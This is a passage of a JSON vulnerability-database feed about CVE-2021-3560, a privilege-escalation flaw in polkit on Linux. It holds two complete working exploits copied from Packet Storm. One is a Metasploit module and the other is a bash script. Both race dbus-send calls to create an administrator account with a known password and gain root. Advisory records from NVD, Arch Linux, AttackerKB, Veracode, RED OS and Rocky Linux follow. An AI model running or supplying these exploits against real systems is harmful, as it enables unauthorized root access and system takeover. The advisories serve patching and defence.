"https://packetstormsecurity.com/files/163452/Polkit-D-Bus-Authentication-Bypass.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'unix_crypt' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Local::Linux \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Polkit D-Bus Authentication Bypass', \n'Description' => %q{ \nA vulnerability exists within the polkit system service that can be leveraged by a local, unprivileged \nattacker to perform privileged operations. In order to leverage the vulnerability, the attacker invokes a \nmethod over D-Bus and kills the client process. This will occasionally cause the operation to complete without \nbeing subjected to all of the necessary authentication. \nThe exploit module leverages this to add a new user with a sudo access and a known password. The new account \nis then leveraged to execute a payload with root privileges. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Kevin Backhouse', # vulnerability discovery and analysis \n'Spencer McIntyre', # metasploit module \n'jheysel-r7' # metasploit module \n], \n'SessionTypes' => ['shell', 'meterpreter'], \n'Platform' => ['unix', 'linux'], \n'References' => [ \n['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'], \n['CVE', '2021-3560'], \n['EDB', '50011'] \n], \n'Targets' => \n[ \n[ 'Automatic', {} ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2021-06-03', \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, SCREEN_EFFECTS], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \nregister_options([ \nOptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\\$)$/), \nOptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]), \nOptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 30]), \nOptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. 
Use this to define how many times each command is attempted', 20]) \n]) \nregister_advanced_options([ \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n]) \nend \n \ndef get_loop_sequence \ndatastore['ITERATIONS'].times.map(&:to_s).join(' ') \nend \n \ndef exploit_set_realname(new_realname) \nloop_sequence = get_loop_sequence \ncmd_exec(<<~SCRIPT \nfor i in #{loop_sequence}; do \ndbus-send \n--system \n--dest=org.freedesktop.Accounts \n--type=method_call \n--print-reply \n/org/freedesktop/Accounts/User0 \norg.freedesktop.Accounts.User.SetRealName \nstring:'#{new_realname}' & \nsleep #{@cmd_delay}; \nkill $!; \ndbus-send \n--system \n--dest=org.freedesktop.Accounts \n--print-reply \n/org/freedesktop/Accounts/User0 \norg.freedesktop.DBus.Properties.Get \nstring:org.freedesktop.Accounts.User \nstring:RealName \n| grep \"string \\\\\"#{new_realname}\\\\\"\"; \nif [ $? -eq 0 ]; then \necho success; \nbreak; \nfi; \ndone \nSCRIPT \n.gsub(/\\s+/, ' ')) =~ /success/ \nend \n \ndef executable?(path) \ncmd_exec(\"test -x '#{path}' && echo true\").include? 'true' \nend \n \ndef get_cmd_delay \nuser = rand_text_alphanumeric(8) \ntime_command = \"bash -c 'time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{user} string:\\\"#{user}\\\" int32:1'\" \ntime = cmd_exec(time_command, nil, datastore['TIMEOUT']).match(/real\\s+\\d+m(\\d+.\\d+)s/) \nunless time && time[1] \nprint_error(\"Unable to determine the time taken to run the dbus command, so the exploit cannot continue. Try increasing the TIMEOUT option. 
The command that failed was: #{time_command}\") \nreturn nil \nend \n \ntime_in_seconds = time[1].to_f \n# The dbus-send command timeout is implementation-defined, typically 25 seconds \n# https://dbus.freedesktop.org/doc/dbus-send.1.html#:~:text=25%20seconds \nif time_in_seconds > datastore['TIMEOUT'].to_f || time_in_seconds > 25.00 \nprint_error('The dbus-send command timed out which means the exploit cannot continue. This is likely due to the session service type being X11 instead of SSH. Please see the module documentation for more information.') \nreturn nil \nend \ntime_in_seconds / 2 \nend \n \ndef check \nif datastore['TIMEOUT'] < 26 \nreturn CheckCode::Unknown(\"TIMEOUT is set to less than 26 seconds, so we can't detect if polkit times out or not.\") \nend \n \nunless cmd_exec('pkexec --version') =~ /pkexec version (\\d+\\S*)/ \nreturn CheckCode::Safe('The polkit framework is not installed.') \nend \n \n# The version as returned by pkexec --version is insufficient to identify whether or not the patch is installed. To \n# do that, the distro specific package manager would need to be queried. See #check_via_version. \npolkit_version = Rex::Version.new(Regexp.last_match(1)) \n \nunless cmd_exec('dbus-send -h') =~ /Usage: dbus-send/ \nreturn CheckCode::Detected('The dbus-send command is not accessible, however the polkit framework is installed.') \nend \n \n# Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit \n@cmd_delay = get_cmd_delay \nreturn CheckCode::Unknown('Failed to calculate the round trip time for the dbus command. This is necessary in order to exploit the target.') if @cmd_delay.nil? 
\n \nstatus = nil \nprint_status('Checking for exploitability via attempt') \nstatus ||= check_via_attempt \nprint_status('Checking for exploitability via version') unless status \nstatus ||= check_via_version \nstatus ||= CheckCode::Detected(\"Detected polkit framework version #{polkit_version}.\") \n \nstatus \nend \n \ndef check_via_attempt \nstatus = nil \nreturn status unless !is_root? && command_exists?('dbus-send') \n \n# This is required to make the /org/freedesktop/Accounts/User0 object_path available. \ndbus_method_call('/org/freedesktop/Accounts', 'org.freedesktop.Accounts.FindUserByName', 'root') \n# Check for the presence of the vulnerability be exploiting it to set the root user's RealName property to a \n# random string before restoring it. \nresult = dbus_method_call('/org/freedesktop/Accounts/User0', 'org.freedesktop.DBus.Properties.Get', 'org.freedesktop.Accounts.User', 'RealName') \nif result =~ /variant\\s+string\\s+\"(.*)\"/ \nold_realname = Regexp.last_match(1) \nif exploit_set_realname(rand_text_alphanumeric(12)) \nstatus = CheckCode::Vulnerable('The polkit framework instance is vulnerable.') \nunless exploit_set_realname(old_realname) \nprint_error('Failed to restore the root user\\'s original \\'RealName\\' property value') \nend \nend \nend \n \nstatus \nend \n \ndef check_via_version \nsysinfo = get_sysinfo \ncase sysinfo[:distro] \nwhen 'fedora' \nif sysinfo[:version] =~ /Fedora( release)? 
(\\d+)/ \ndistro_version = Regexp.last_match(2).to_i \nif distro_version < 20 \nreturn CheckCode::Safe(\"Fedora version #{distro_version} is not affected (too old).\") \nelsif distro_version < 33 \nreturn CheckCode::Appears(\"Fedora version #{distro_version} is affected.\") \nelsif distro_version == 33 \n# see: https://bodhi.fedoraproject.org/updates/FEDORA-2021-3f8d6016c9 \npatched_version_string = '0.117-2.fc33.1' \nelsif distro_version == 34 \n# see: https://bodhi.fedoraproject.org/updates/FEDORA-2021-0ec5a8a74b \npatched_version_string = '0.117-3.fc34.1' \nelsif distro_version > 34 \nreturn CheckCode::Safe(\"Fedora version #{distro_version} is not affected.\") \nend \n \nresult = cmd_exec('dnf list installed \"polkit.*\"') \nif result =~ /polkit\\.\\S+\\s+(\\d\\S+)\\s+/ \ncurrent_version_string = Regexp.last_match(1) \nif Rex::Version.new(current_version_string) < Rex::Version.new(patched_version_string) \nreturn CheckCode::Appears(\"Version #{current_version_string} is affected.\") \nelse \nreturn CheckCode::Safe(\"Version #{current_version_string} is not affected.\") \nend \nend \nend \nwhen 'ubuntu' \nresult = cmd_exec('apt-cache policy policykit-1') \nif result =~ /\\s+Installed: (\\S+)$/ \ncurrent_version_string = Regexp.last_match(1) \ncurrent_version = Rex::Version.new(current_version_string.gsub(/ubuntu/, '.')) \n \nif current_version < Rex::Version.new('0.105-26') \n# The vulnerability was introduced in 0.105-26 \nreturn CheckCode::Safe(\"Version #{current_version_string} is not affected (too old, the vulnerability was introduced in 0.105-26).\") \nend \n \n# See: https://ubuntu.com/security/notices/USN-4980-1 \n# The 'ubuntu' part of the string must be removed for Rex::Version compatibility, treat it as a point place. 
\ncase sysinfo[:version] \nwhen /21\\.04/ \npatched_version_string = '0.105-30ubuntu0.1' \nwhen /20\\.10/ \npatched_version_string = '0.105-29ubuntu0.1' \nwhen /20\\.04/ \npatched_version_string = '0.105-26ubuntu1.1' \nwhen /19\\.10/ \nreturn CheckCode::Appears('Ubuntu 19.10 is affected.') \nend \n# Ubuntu 19.04 and older are *not* affected \n \nif current_version < Rex::Version.new(patched_version_string.gsub(/ubuntu/, '.')) \nreturn CheckCode::Appears(\"Version #{current_version_string} is affected.\") \nend \n \nreturn CheckCode::Safe(\"Version #{current_version_string} is not affected.\") \nend \nend \nend \n \ndef cmd_exec(*args) \nresult = super \nresult.gsub(/(\\e\\(B)?\\e\\[([;\\d]+)?m/, '') # remove ANSI escape sequences from the command output \nend \n \ndef dbus_method_call(object_path, interface_member, *args) \ncmd_args = %w[dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply] \ncmd_args << object_path \ncmd_args << interface_member \nargs.each do |arg| \nif arg.is_a?(Integer) \ncmd_args << \"int32:#{arg}\" \nelsif arg.is_a?(String) \ncmd_args << \"string:'#{arg}'\" \nend \nend \n \ncmd = cmd_args.join(' ') \nvprint_status(\"Running: #{cmd}\") \ncmd_exec(cmd) \nend \n \ndef create_unix_crypt_hash \nUnixCrypt::SHA256.build(datastore['PASSWORD'].to_s) \nend \n \ndef exploit_set_username(loop_sequence) \ncmd_exec(<<~SCRIPT \nfor i in #{loop_sequence}; do \ndbus-send \n--system \n--dest=org.freedesktop.Accounts \n--type=method_call \n--print-reply \n/org/freedesktop/Accounts \norg.freedesktop.Accounts.CreateUser \nstring:#{datastore['USERNAME']} \nstring:\\\"#{datastore['USERNAME']}\\\" \nint32:1 & \nsleep #{@cmd_delay}s; \nkill $!; \nif id #{datastore['USERNAME']}; then \necho \\\"success\\\"; \nbreak; \nfi; \ndone \nSCRIPT \n.gsub(/\\s+/, ' ')) =~ /success/ \nend \n \ndef exploit_set_password(uid, hashed_password, loop_sequence) \ncmd_exec(<<~SCRIPT \nfor i in #{loop_sequence}; do \ndbus-send \n--system 
\n--dest=org.freedesktop.Accounts \n--type=method_call \n--print-reply \n/org/freedesktop/Accounts/User#{uid} \norg.freedesktop.Accounts.User.SetPassword \nstring:'#{hashed_password}' \nstring: & \nsleep #{@cmd_delay}s; \nkill $!; \necho #{datastore['PASSWORD']} \n| su - #{datastore['USERNAME']} \n-c \\\"echo #{datastore['PASSWORD']} | sudo -S id\\\" \n| grep \\\"uid=0(root)\\\"; \nif [ $? -eq 0 ]; then \necho \\\"success\\\"; \nbreak; \nfi; \ndone; \nSCRIPT \n.gsub(/\\s+/, ' ')) =~ /success/ \nend \n \ndef exploit_delete_user(uid, loop_sequence) \ncmd_exec(<<~SCRIPT \nfor i in #{loop_sequence}; do \ndbus-send \n--system \n--dest=org.freedesktop.Accounts \n--type=method_call \n--print-reply \n/org/freedesktop/Accounts \norg.freedesktop.Accounts.DeleteUser \nint64:#{uid} \nboolean:true & \nsleep #{@cmd_delay}s; \nkill $!; \nif id #{datastore['USERNAME']}; then \necho \\\"failed\\\"; \nelse \necho \\\"success\\\"; \nbreak; \nfi; \ndone \nSCRIPT \n.gsub(/\\s+/, ' ')) =~ /success/ \nend \n \ndef upload(path, data) \nprint_status(\"Writing '#{path}' (#{data.size} bytes) ...\") \nrm_f(path) \nwrite_file(path, data) \nregister_file_for_cleanup(path) \nend \n \ndef upload_and_chmodx(path, data) \nupload(path, data) \nchmod(path) \nend \n \ndef upload_payload \nfname = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(5)}\" \nupload_and_chmodx(fname, generate_payload_exe) \nreturn nil unless file_exist?(fname) \n \nfname \nend \n \ndef execute_payload(fname) \ncmd_exec(\"echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \\\"echo #{datastore['PASSWORD']} | sudo -S #{fname}\\\"\") \nend \n \ndef exploit \nfail_with(Failure::NotFound, 'Failed to find the su command which this exploit depends on.') unless command_exists?('su') \nfail_with(Failure::NotFound, 'Failed to find the dbus-send command which this exploit depends on.') unless command_exists?('dbus-send') \nif datastore['TIMEOUT'] < 26 \nfail_with(Failure::BadConfig, \"TIMEOUT is set to less than 
26 seconds, so we can't detect if dbus-send times out or not.\") \nend \n \nif @cmd_delay.nil? \n# cmd_delay wasn't set yet which is needed for the rest of the exploit to operate, \n# likely cause the check method wasn't executed. Lets set it so long. \n \n# Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit \n@cmd_delay = get_cmd_delay \nfail_with(Failure::Unknown, 'Failed to calculate the round trip time for the dbus command. This is necessary in order to exploit the target.') if @cmd_delay.nil? \nend \n \nprint_status(\"Attempting to create user #{datastore['USERNAME']}\") \nloop_sequence = get_loop_sequence \n \nfail_with(Failure::BadConfig, \"The user #{datastore['USERNAME']} was unable to be created. Try increasing the ITERATIONS amount.\") unless exploit_set_username(loop_sequence) \nuid = cmd_exec(\"id -u #{datastore['USERNAME']}\") \nprint_good(\"User #{datastore['USERNAME']} created with UID #{uid}\") \nprint_status(\"Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}\") \nif exploit_set_password(uid, create_unix_crypt_hash, loop_sequence) \nprint_good('Obtained code execution as root!') \nfname = upload_payload \nexecute_payload(fname) \nelse \nprint_error(\"Attempted to set the password #{datastore['Iterations']} times, did not work.\") \nend \n \nprint_status('Attempting to remove the user added: ') \nif exploit_delete_user(uid, loop_sequence) \nprint_good(\"Successfully removed #{datastore['USERNAME']}\") \nelse \nprint_warning(\"Unable to remove user: #{datastore['USERNAME']}, created during the running of this module\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/163452/polkit_dbus_auth_bypass.rb.txt"}, {"lastseen": "2021-06-15T15:56:14", "description": "", "cvss3": {}, "published": "2021-06-15T00:00:00", "type": "packetstorm", "title": 
"Polkit 0.105-26 0.117-2 Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-15T00:00:00", "id": "PACKETSTORM:163142", "href": "https://packetstormsecurity.com/files/163142/Polkit-0.105-26-0.117-2-Privilege-Escalation.html", "sourceData": "`# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation \n# Date: 06/11/2021 \n# Exploit Author: J Smith (CadmusofThebes) \n# Vendor Homepage: https://www.freedesktop.org/ \n# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html \n# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora) \n# Tested on: Ubuntu 20.04, Fedora 33 \n# CVE: CVE-2021-3560 \n# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/ \n \n#!/bin/bash \n \n# Set the name and display name \nuserName=\"hacked\" \nrealName=\"hacked\" \n \n# Set the account as an administrator \naccountType=1 \n \n# Set the password hash for 'password' and password hint \npassword='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB' \npassHint=\"password\" \n \n# Check Polkit version \npolkitVersion=$(systemctl status polkit.service | grep version | cut -d \" \" -f 9) \nif [[ \"$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)\" -ge 1 || \"$(yum list installed | grep polkit | grep -c 0.117-2)\" ]]; then \necho \"[*] Vulnerable version of polkit found\" \nelse \necho \"[!] WARNING: Version of polkit might not vulnerable\" \nfi \n \n# Validate user is running in SSH instead of desktop terminal \nif [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then \necho \"[!] 
WARNING: SSH into localhost first before running this script in order to avoid authentication prompts\" \nexit \nfi \n \n# Test the dbus-send timing to load into exploit \necho \"[*] Determining dbus-send timing\" \nrealTime=$( TIMEFORMAT=\"%R\"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d \" \" -f6 ) \nhalfTime=$(echo \"scale=3;$realTime/2\" | bc) \n \n# Check for user first in case previous run of script failed on password set \nif id \"$userName\" &>/dev/null; then \nuserid=$(id -u $userName) \necho \"[*] New user $userName already exists with uid of $userid\" \nelse \nuserid=\"\" \necho \"[*] Attempting to create account\" \nwhile [[ $userid == \"\" ]] \ndo \ndbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null \nif id \"$userName\" &>/dev/null; then \nuserid=$(id -u $userName) \necho \"[*] New user $userName created with uid of $userid\" \nfi \ndone \nfi \n \n# Add the password to /etc/shadow \necho \"[*] Adding password to /etc/shadow\" \nx=0 \nwhile [ $x -lt 100 ] \ndo \ndbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null \nx=$(($x + 1)) \ndone \n \necho \"[*] Exploit complete! 
If the password does not work, run the exploit again\" \necho \"\" \necho \"[*] Run 'su - $userName', followed by 'sudo su' to gain root access\" \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/163142/polkit010526-escalate.txt"}], "cve": [{"lastseen": "2023-06-19T14:51:38", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T19:15:00", "type": "cve", "title": "CVE-2021-3560", "cwe": ["CWE-754"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-06-12T07:15:00", "cpe": ["cpe:/o:debian:debian_linux:11.0", "cpe:/a:redhat:openshift_container_platform:4.7", "cpe:/a:redhat:virtualization_host:4.0", 
"cpe:/a:redhat:virtualization:4.0", "cpe:/o:canonical:ubuntu_linux:20.04"], "id": "CVE-2021-3560", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift_container_platform:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:*:*:*:*"]}], "redos": [{"lastseen": "2023-09-08T15:46:54", "description": "A vulnerability in the polkit_system_bus_name_get_creds_sync() function of the dbus-daemon of the Polkit library is related to access control flaws. Exploitation of the vulnerability could allow an attacker to escalate their privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-23T00:00:00", "type": "redos", "title": "ROS-20211223-06", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-12-23T00:00:00", "id": "ROS-20211223-06", "href": 
"https://redos.red-soft.ru/support/secure/uyazvimosti/uyazvimost-polkit-cve-2021-3560/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2023-06-19T15:01:16", "description": "Arch Linux Security Advisory ASA-202106-24\n==========================================\n\nSeverity: Medium\nDate : 2021-06-09\nCVE-ID : CVE-2021-3560\nPackage : polkit\nType : privilege escalation\nRemote : No\nLink : https://security.archlinux.org/AVG-2028\n\nSummary\n=======\n\nThe package polkit before version 0.119-1 is vulnerable to privilege\nescalation.\n\nResolution\n==========\n\nUpgrade to 0.119-1.\n\n# pacman -Syu \"polkit>=0.119-1\"\n\nThe problem has been fixed upstream in version 0.119.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA security issue was found in polkit before version 0.119. When a\nrequesting process disconnects from dbus-daemon just before the call to\npolkit_system_bus_name_get_creds_sync starts, the process cannot get a\nunique uid and pid of the process and it cannot verify the privileges\nof the requesting process.\n\nImpact\n======\n\nA local attacker could escalate privileges by exploiting a race\ncondition.\n\nReferences\n==========\n\nhttps://www.openwall.com/lists/oss-security/2021/06/03/1\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1961710\nhttps://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/\nhttps://gitlab.freedesktop.org/polkit/polkit/-/commit/a04d13affe0fa53ff618e07aa8f57f4c0e3b9b81\nhttps://security.archlinux.org/CVE-2021-3560", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2021-06-09T00:00:00", "type": "archlinux", "title": "[ASA-202106-24] polkit: privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-09T00:00:00", "id": "ASA-202106-24", "href": "https://security.archlinux.org/ASA-202106-24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-07-11T11:16:42", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.\n\n \n**Recent assessments:** \n \n**jheysel-r7** at October 05, 2022 7:28pm UTC reported:\n\nPolkit is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones. D-Bus is a message-oriented middleware mechanism that allows communication between multiple processes running concurrently on the same machine.\n\nA vulnerability was found in Polkit that allows a local unprivileged attacker to obtain execution as the root user. The attacker needs to invoke a method over D-Bus and then kill the client process. 
Not always, but sometimes this will cause the operation to complete without requiring authentication.\n\nThis allows a local unprivileged attacker to attempt to create a new user with sudo access and a known password. When successful, the attacker can then execute a payload with root privileges.\n\nThis is bad. Polkit is installed by default across many Linux distributions making this a fantastic attack vector. Very important to patch!\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-3560", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-02-16T00:00:00", "id": "AKB:10791C9D-4C05-4C36-8F8D-BAA2EE6DC9B7", "href": "https://attackerkb.com/topics/Jcs7hHRUxg/cve-2021-3560", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2022-07-26T13:49:05", "description": "policykit-1 is vulnerable to denial of service. 
The vulnerability exists because the system is unable to get a unique uid and pid of the process and cannot verify the privileges of the requesting process.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T22:46:32", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-07-11T20:46:39", "id": "VERACODE:30804", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30804/summary", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "rocky": [{"lastseen": "2023-07-24T17:27:08", "description": "An update is available for polkit.\nThis update affects Rocky Linux 8.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list.\nThe polkit packages provide a component for controlling system-wide privileges. 
This component provides a uniform and organized way for non-privileged processes to communicate with privileged ones.\n\nSecurity Fix(es):\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T07:54:47", "type": "rocky", "title": "polkit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": 